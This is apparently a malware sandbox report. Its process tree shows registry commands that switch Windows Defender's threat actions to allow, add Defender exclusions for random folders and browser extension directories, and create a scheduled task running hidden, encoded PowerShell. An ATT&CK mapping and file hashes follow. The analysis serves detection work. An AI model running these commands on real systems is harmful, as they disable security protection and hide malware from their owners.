\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2768

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:2608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:4688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:4576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:2432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:1204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:2792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:3752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FiFxFOAKFlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MtmchuUihttnWuuiNDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YDeMNrUWYcEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cyYOBkwuU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sggSNgPbIWTFC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VdsMkNQPiTWtDKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ffBOsjvhiwhBXqAi\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1352

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:4140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FiFxFOAKFlUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MtmchuUihttnWuuiNDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDeMNrUWYcEU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cyYOBkwuU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sggSNgPbIWTFC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VdsMkNQPiTWtDKVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:32
3⤵
PID:1428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw /t REG_DWORD /d 0 /reg:64
3⤵
PID:2832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:32
3⤵
PID:2800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ffBOsjvhiwhBXqAi /t REG_DWORD /d 0 /reg:64
3⤵
PID:4240

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gVDRwbqLW" /SC once /ST 00:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:3244

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gVDRwbqLW"
2⤵
PID:3420

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:720

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:8

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
Filesize
2.5MB

MD5
b2a22d65280abb89e601550434af57a1

SHA1
1f38d1c222b44ad78d7050f7454ee9289c32452b

SHA256
bbf2f049ace040531f02f74be8a62838f46fdb83c94d5d2a1a675f3288d7cdc3

SHA512
c17d83af8b31275f1783df55792c71e6f47dc5a8e80f4d78ab62379a5a32c0b4c8966e2807922577ec5211efcee3ecde40e40c9f59a9ff2d1b298fbacebdf669

Download Submit
C:\Program Files (x86)\ImageComparer\IC329.exe
Filesize
5.1MB

MD5
5a37ea79983033abd4da83a9c3b9d615

SHA1
ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf

SHA256
7115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74

SHA512
eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48

Download Submit
C:\Program Files (x86)\ImageComparer\IC329.exe
Filesize
5.1MB

MD5
5a37ea79983033abd4da83a9c3b9d615

SHA1
ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf

SHA256
7115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74

SHA512
eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48

Download Submit
C:\Program Files (x86)\ImageComparer\IC329.exe
Filesize
5.1MB

MD5
5a37ea79983033abd4da83a9c3b9d615

SHA1
ea71b21a0afa2925b7afdc10921ee2dfe9e4bdcf

SHA256
7115f59cfe36e2e6ce6f254110973ff72c054b8fdce560d4d6244afd47c90c74

SHA512
eb2ce09697155434d659ed5e64738554d54039c903a08db61bc1a957168057b88c1e3662ecfce9fd8c1469ba394a817b442364856bc1877ca77a33200be32d48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe
Filesize
1.7MB

MD5
cd977fd8e4228b5910c6efd938d6d412

SHA1
7e226827103aa7bca9f2b63b1340ecb6422dfc6f

SHA256
c18e5c8ffe6fa429bb88fdc3eca4b6e63304baf1c270b405eb6607ba7e7c8ab7

SHA512
3f4db6a3d7cf6d78677a8f1da5b7e1c1c84b92e0880c9195046ea24961acd910ba24cbfaf0188420ff52ce7d7d7b53f833d917694807d12ab3d8f92702fa099a

Download Submit
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe
Filesize
1.7MB

MD5
cd977fd8e4228b5910c6efd938d6d412

SHA1
7e226827103aa7bca9f2b63b1340ecb6422dfc6f

SHA256
c18e5c8ffe6fa429bb88fdc3eca4b6e63304baf1c270b405eb6607ba7e7c8ab7

SHA512
3f4db6a3d7cf6d78677a8f1da5b7e1c1c84b92e0880c9195046ea24961acd910ba24cbfaf0188420ff52ce7d7d7b53f833d917694807d12ab3d8f92702fa099a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe
Filesize
6.8MB

MD5
d5bbadf7eb608dbaeb7999385071d561

SHA1
dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4

SHA256
77e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a

SHA512
acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe
Filesize
6.8MB

MD5
d5bbadf7eb608dbaeb7999385071d561

SHA1
dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4

SHA256
77e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a

SHA512
acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_efb1apwq.k1s.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe
Filesize
6.8MB

MD5
d5bbadf7eb608dbaeb7999385071d561

SHA1
dddfe1f735c8c07831788f7e1ecfcca7b7bd61d4

SHA256
77e7b35c5b347d17c238687e387b38ca5d2b26f40ed413d288d3ef177557295a

SHA512
acd1afa271554625a01d83f6fbc83e7504c46a140a273b6b8eeefe56b023f5dcdc17fe354e1b296c83ac14769b63aeb4a29579a6189b2fd3b29fd7da264f72d9

Download Submit
